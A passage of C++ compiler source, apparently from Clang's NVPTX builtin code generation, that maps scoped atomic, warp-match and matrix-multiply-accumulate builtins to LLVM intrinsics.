return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_release_add_shared_i:
case NVPTX::BI__nvvm_atom_release_add_shared_l:
case NVPTX::BI__nvvm_atom_release_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_release);
case NVPTX::BI__nvvm_atom_release_add_shared_f:
case NVPTX::BI__nvvm_atom_release_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_release);
case NVPTX::BI__nvvm_atom_release_xchg_shared_i:
case NVPTX::BI__nvvm_atom_release_xchg_shared_l:
case NVPTX::BI__nvvm_atom_release_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_release);
case NVPTX::BI__nvvm_atom_release_max_shared_i:
case NVPTX::BI__nvvm_atom_release_max_shared_l:
case NVPTX::BI__nvvm_atom_release_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_release);
case NVPTX::BI__nvvm_atom_release_max_shared_ui:
case NVPTX::BI__nvvm_atom_release_max_shared_ul:
case NVPTX::BI__nvvm_atom_release_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_release);
case NVPTX::BI__nvvm_atom_release_min_shared_i:
case NVPTX::BI__nvvm_atom_release_min_shared_l:
case NVPTX::BI__nvvm_atom_release_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_release);
case NVPTX::BI__nvvm_atom_release_min_shared_ui:
case NVPTX::BI__nvvm_atom_release_min_shared_ul:
case NVPTX::BI__nvvm_atom_release_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_release);
case NVPTX::BI__nvvm_atom_release_inc_shared_ui:
case NVPTX::BI__nvvm_atom_release_inc_shared_ul:
case NVPTX::BI__nvvm_atom_release_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_release);
case NVPTX::BI__nvvm_atom_release_dec_shared_ui:
case NVPTX::BI__nvvm_atom_release_dec_shared_ul:
case NVPTX::BI__nvvm_atom_release_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_release);
case NVPTX::BI__nvvm_atom_release_and_shared_i:
case NVPTX::BI__nvvm_atom_release_and_shared_l:
case NVPTX::BI__nvvm_atom_release_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_release);
case NVPTX::BI__nvvm_atom_release_or_shared_i:
case NVPTX::BI__nvvm_atom_release_or_shared_l:
case NVPTX::BI__nvvm_atom_release_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_release);
case NVPTX::BI__nvvm_atom_release_xor_shared_i:
case NVPTX::BI__nvvm_atom_release_xor_shared_l:
case NVPTX::BI__nvvm_atom_release_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_release);
case NVPTX::BI__nvvm_atom_release_cas_shared_i:
case NVPTX::BI__nvvm_atom_release_cas_shared_l:
case NVPTX::BI__nvvm_atom_release_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_release);
case NVPTX::BI__nvvm_atom_release_cta_add_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_add_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_add_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_add_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_add_shared_f:
case NVPTX::BI__nvvm_atom_release_cta_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_add_shared_f:
case NVPTX::BI__nvvm_atom_release_sys_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_xchg_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_xchg_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_xchg_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_xchg_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_max_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_max_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_max_shared_ui:
case NVPTX::BI__nvvm_atom_release_cta_max_shared_ul:
case NVPTX::BI__nvvm_atom_release_cta_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_max_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_max_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_max_shared_ui:
case NVPTX::BI__nvvm_atom_release_sys_max_shared_ul:
case NVPTX::BI__nvvm_atom_release_sys_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_min_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_min_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_min_shared_ui:
case NVPTX::BI__nvvm_atom_release_cta_min_shared_ul:
case NVPTX::BI__nvvm_atom_release_cta_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_min_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_min_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_min_shared_ui:
case NVPTX::BI__nvvm_atom_release_sys_min_shared_ul:
case NVPTX::BI__nvvm_atom_release_sys_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_inc_shared_ui:
case NVPTX::BI__nvvm_atom_release_cta_inc_shared_ul:
case NVPTX::BI__nvvm_atom_release_cta_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_dec_shared_ui:
case NVPTX::BI__nvvm_atom_release_cta_dec_shared_ul:
case NVPTX::BI__nvvm_atom_release_cta_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_inc_shared_ui:
case NVPTX::BI__nvvm_atom_release_sys_inc_shared_ul:
case NVPTX::BI__nvvm_atom_release_sys_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_dec_shared_ui:
case NVPTX::BI__nvvm_atom_release_sys_dec_shared_ul:
case NVPTX::BI__nvvm_atom_release_sys_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_and_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_and_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_and_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_and_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_or_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_or_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_or_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_or_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_xor_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_xor_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_xor_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_xor_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_cas_shared_i:
case NVPTX::BI__nvvm_atom_release_cta_cas_shared_l:
case NVPTX::BI__nvvm_atom_release_cta_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_cas_shared_i:
case NVPTX::BI__nvvm_atom_release_sys_cas_shared_l:
case NVPTX::BI__nvvm_atom_release_sys_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_release_sys);
case NVPTX::BI__nvvm_atom_acq_rel_add_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_add_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_add_shared_f:
case NVPTX::BI__nvvm_atom_acq_rel_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_xchg_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_xchg_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_max_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_max_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_max_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_max_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_min_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_min_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_min_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_min_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_inc_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_inc_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_dec_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_dec_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_and_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_and_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_or_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_or_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_xor_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_xor_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_cas_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cas_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_shared_f:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_shared_f:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_shared_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_shared_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_shared_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_shared_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_acq_rel_sys);
case NVPTX::BI__nvvm_match_all_sync_i32p:
case NVPTX::BI__nvvm_match_all_sync_i64p: {
Value *Mask = EmitScalarExpr(E->getArg(0));
Value *Val = EmitScalarExpr(E->getArg(1));
Address PredOutPtr = EmitPointerWithAlignment(E->getArg(2));
Value *ResultPair = Builder.CreateCall(
CGM.getIntrinsic(BuiltinID == NVPTX::BI__nvvm_match_all_sync_i32p
? Intrinsic::nvvm_match_all_sync_i32p
: Intrinsic::nvvm_match_all_sync_i64p),
{Mask, Val});
Value *Pred = Builder.CreateZExt(Builder.CreateExtractValue(ResultPair, 1),
PredOutPtr.getElementType());
Builder.CreateStore(Pred, PredOutPtr);
return Builder.CreateExtractValue(ResultPair, 0);
}
// FP MMA loads
case NVPTX::BI__hmma_m16n16k16_ld_a:
case NVPTX::BI__hmma_m16n16k16_ld_b:
case NVPTX::BI__hmma_m16n16k16_ld_c_f16:
case NVPTX::BI__hmma_m16n16k16_ld_c_f32:
case NVPTX::BI__hmma_m32n8k16_ld_a:
case NVPTX::BI__hmma_m32n8k16_ld_b:
case NVPTX::BI__hmma_m32n8k16_ld_c_f16:
case NVPTX::BI__hmma_m32n8k16_ld_c_f32:
case NVPTX::BI__hmma_m8n32k16_ld_a:
case NVPTX::BI__hmma_m8n32k16_ld_b:
case NVPTX::BI__hmma_m8n32k16_ld_c_f16:
case NVPTX::BI__hmma_m8n32k16_ld_c_f32:
// Integer MMA loads.
case NVPTX::BI__imma_m16n16k16_ld_a_s8:
case NVPTX::BI__imma_m16n16k16_ld_a_u8:
case NVPTX::BI__imma_m16n16k16_ld_b_s8:
case NVPTX::BI__imma_m16n16k16_ld_b_u8:
case NVPTX::BI__imma_m16n16k16_ld_c:
case NVPTX::BI__imma_m32n8k16_ld_a_s8:
case NVPTX::BI__imma_m32n8k16_ld_a_u8:
case NVPTX::BI__imma_m32n8k16_ld_b_s8:
case NVPTX::BI__imma_m32n8k16_ld_b_u8:
case NVPTX::BI__imma_m32n8k16_ld_c:
case NVPTX::BI__imma_m8n32k16_ld_a_s8:
case NVPTX::BI__imma_m8n32k16_ld_a_u8:
case NVPTX::BI__imma_m8n32k16_ld_b_s8:
case NVPTX::BI__imma_m8n32k16_ld_b_u8:
case NVPTX::BI__imma_m8n32k16_ld_c:
// Sub-integer MMA loads.
case NVPTX::BI__imma_m8n8k32_ld_a_s4:
case NVPTX::BI__imma_m8n8k32_ld_a_u4:
case NVPTX::BI__imma_m8n8k32_ld_b_s4:
case NVPTX::BI__imma_m8n8k32_ld_b_u4:
case NVPTX::BI__imma_m8n8k32_ld_c:
case NVPTX::BI__bmma_m8n8k128_ld_a_b1:
case NVPTX::BI__bmma_m8n8k128_ld_b_b1:
case NVPTX::BI__bmma_m8n8k128_ld_c:
// Double MMA loads.
case NVPTX::BI__dmma_m8n8k4_ld_a:
case NVPTX::BI__dmma_m8n8k4_ld_b:
case NVPTX::BI__dmma_m8n8k4_ld_c:
// Alternate float MMA loads.
case NVPTX::BI__mma_bf16_m16n16k16_ld_a:
case NVPTX::BI__mma_bf16_m16n16k16_ld_b:
case NVPTX::BI__mma_bf16_m8n32k16_ld_a:
case NVPTX::BI__mma_bf16_m8n32k16_ld_b:
case NVPTX::BI__mma_bf16_m32n8k16_ld_a:
case NVPTX::BI__mma_bf16_m32n8k16_ld_b:
case NVPTX::BI__mma_tf32_m16n16k8_ld_a:
case NVPTX::BI__mma_tf32_m16n16k8_ld_b:
case NVPTX::BI__mma_tf32_m16n16k8_ld_c: {
Address Dst = EmitPointerWithAlignment(E->getArg(0));
Value *Src = EmitScalarExpr(E->getArg(1));
Value *Ldm = EmitScalarExpr(E->getArg(2));
Optional<llvm::APSInt> isColMajorArg =
E->getArg(3)->getIntegerConstantExpr(getContext());
if (!isColMajorArg)
return nullptr;
bool isColMajor = isColMajorArg->getSExtValue();
NVPTXMmaLdstInfo II = getNVPTXMmaLdstInfo(BuiltinID);
unsigned IID = isColMajor ? II.IID_col : II.IID_row;
if (IID == 0)
return nullptr;
Value *Result =
Builder.CreateCall(CGM.getIntrinsic(IID, Src->getType()), {Src, Ldm});
// Save returned values.
assert(II.NumResults);
if (II.NumResults == 1) {
Builder.CreateAlignedStore(Result, Dst.getPointer(),
CharUnits::fromQuantity(4));
} else {
for (unsigned i = 0; i < II.NumResults; ++i) {
Builder.CreateAlignedStore(
Builder.CreateBitCast(Builder.CreateExtractValue(Result, i),
Dst.getElementType()),
Builder.CreateGEP(Dst.getElementType(), Dst.getPointer(),
llvm::ConstantInt::get(IntTy, i)),
CharUnits::fromQuantity(4));
}
}
return Result;
}
case NVPTX::BI__hmma_m16n16k16_st_c_f16:
case NVPTX::BI__hmma_m16n16k16_st_c_f32:
case NVPTX::BI__hmma_m32n8k16_st_c_f16:
case NVPTX::BI__hmma_m32n8k16_st_c_f32:
case NVPTX::BI__hmma_m8n32k16_st_c_f16:
case NVPTX::BI__hmma_m8n32k16_st_c_f32:
case NVPTX::BI__imma_m16n16k16_st_c_i32:
case NVPTX::BI__imma_m32n8k16_st_c_i32:
case NVPTX::BI__imma_m8n32k16_st_c_i32:
case NVPTX::BI__imma_m8n8k32_st_c_i32:
case NVPTX::BI__bmma_m8n8k128_st_c_i32:
case NVPTX::BI__dmma_m8n8k4_st_c_f64:
case NVPTX::BI__mma_m16n16k8_st_c_f32: {
Value *Dst = EmitScalarExpr(E->getArg(0));
Address Src = EmitPointerWithAlignment(E->getArg(1));
Value *Ldm = EmitScalarExpr(E->getArg(2));
Optional<llvm::APSInt> isColMajorArg =
E->getArg(3)->getIntegerConstantExpr(getContext());
if (!isColMajorArg)
return nullptr;
bool isColMajor = isColMajorArg->getSExtValue();
NVPTXMmaLdstInfo II = getNVPTXMmaLdstInfo(BuiltinID);
unsigned IID = isColMajor ? II.IID_col : II.IID_row;
if (IID == 0)
return nullptr;
Function *Intrinsic =
CGM.getIntrinsic(IID, Dst->getType());
llvm::Type *ParamType = Intrinsic->getFunctionType()->getParamType(1);
SmallVector<Value *, 10> Values = {Dst};
for (unsigned i = 0; i < II.NumResults; ++i) {
Value *V = Builder.CreateAlignedLoad(
Src.getElementType(),
Builder.CreateGEP(Src.getElementType(), Src.getPointer(),
llvm::ConstantInt::get(IntTy, i)),
CharUnits::fromQuantity(4));
Values.push_back(Builder.CreateBitCast(V, ParamType));
}
Values.push_back(Ldm);
Value *Result = Builder.CreateCall(Intrinsic, Values);
return Result;
}
// BI__hmma_m16n16k16_mma_<Dtype><CType>(d, a, b, c, layout, satf) -->
// Intrinsic::nvvm_wmma_m16n16k16_mma_sync<layout A,B><DType><CType><Satf>
case NVPTX::BI__hmma_m16n16k16_mma_f16f16:
case NVPTX::BI__hmma_m16n16k16_mma_f32f16:
case NVPTX::BI__hmma_m16n16k16_mma_f32f32:
case NVPTX::BI__hmma_m16n16k16_mma_f16f32:
case NVPTX::BI__hmma_m32n8k16_mma_f16f16:
case NVPTX::BI__hmma_m32n8k16_mma_f32f16:
case NVPTX::BI__hmma_m32n8k16_mma_f32f32:
case NVPTX::BI__hmma_m32n8k16_mma_f16f32:
case NVPTX::BI__hmma_m8n32k16_mma_f16f16:
case NVPTX::BI__hmma_m8n32k16_mma_f32f16:
case NVPTX::BI__hmma_m8n32k16_mma_f32f32:
case NVPTX::BI__hmma_m8n32k16_mma_f16f32:
case NVPTX::BI__imma_m16n16k16_mma_s8:
case NVPTX::BI__imma_m16n16k16_mma_u8:
case NVPTX::BI__imma_m32n8k16_mma_s8:
case NVPTX::BI__imma_m32n8k16_mma_u8:
case NVPTX::BI__imma_m8n32k16_mma_s8:
case NVPTX::BI__imma_m8n32k16_mma_u8:
case NVPTX::BI__imma_m8n8k32_mma_s4:
case NVPTX::BI__imma_m8n8k32_mma_u4:
case NVPTX::BI__bmma_m8n8k128_mma_xor_popc_b1:
case NVPTX::BI__bmma_m8n8k128_mma_and_popc_b1:
case NVPTX::BI__dmma_m8n8k4_mma_f64:
case NVPTX::BI__mma_bf16_m16n16k16_mma_f32:
case NVPTX::BI__mma_bf16_m8n32k16_mma_f32:
case NVPTX::BI__mma_bf16_m32n8k16_mma_f32:
